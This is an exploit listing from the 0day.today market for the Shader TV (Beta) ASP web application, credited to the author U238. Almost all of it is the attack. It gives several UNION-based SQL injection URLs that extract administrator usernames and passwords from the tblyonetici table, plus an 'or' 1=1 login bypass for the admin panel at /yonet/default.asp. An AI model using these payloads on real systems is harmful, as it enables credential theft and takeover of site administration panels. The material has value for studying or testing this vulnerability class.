[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Shader TV (Beta) Multiple Remote SQL Injection Vulnerabilities

Author
U238
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2974
Category
web applications
Date add
07-05-2008
Platform
unsorted
==============================================================
Shader TV (Beta) Multiple Remote SQL Injection Vulnerabilities
==============================================================


Shader TV (Beta) Multiple Remote SQL Injection Vulnerable

Script : http://rapidshare.de/files/39341463/ShaderTV.zip.html

Coded  : Asp

Lnguae : Acces


Discovered By U238 | < Ugurcan Engin > 

Friends : ka0x - The_BekiR - Marco Almeida - Erhan Bulut - Caborz  :

Web - Designer Solution Developer



0x1 = [S** Says : Allah Belan? Versin Ulan Siz0 !]

0x2 = [Ben Sadece Iyi Bir Insan Olmak Istemistim ] 


Exploit:

Administrator Login to  creative web panel is atack of to SQL injectin.


http://localhost:2222/lab/ShaderTV/yonet/kanal.asp?islem=degistir&sid=13+union+select+0,kullanici,parola,3,4,5+from+tblyonetici

----

http://localhost:2222/lab/ShaderTV/yonet/google.asp?islem=degistir&sid=1+union+select+0,parola+from+tblyonetici&sayfa=1

http://localhost:2222/lab/ShaderTV/yonet/google.asp?islem=degistir&sid=1+union+select+0,kullanici+from+tblyonetici&sayfa=1

----

http://localhost:2222/lab/ShaderTV/yonet/hakk.asp?islem=degistir&sid=2+union+select+0,parola+from+tblyonetici

http://localhost:2222/lab/ShaderTV/yonet/hakk.asp?islem=degistir&sid=2+union+select+0,kullanici+from+tblyonetici


Administrator Panel : 

target/ShaderTV/yonet



-------------------------------

Admin Panel Login Bypass :

target/ShaderTV/yonet/default.asp


username : 'or' 1=1

password : 'or' 1=1


This is Admin Panel See You ?


---------------------------------



#  0day.today [2024-12-24]  #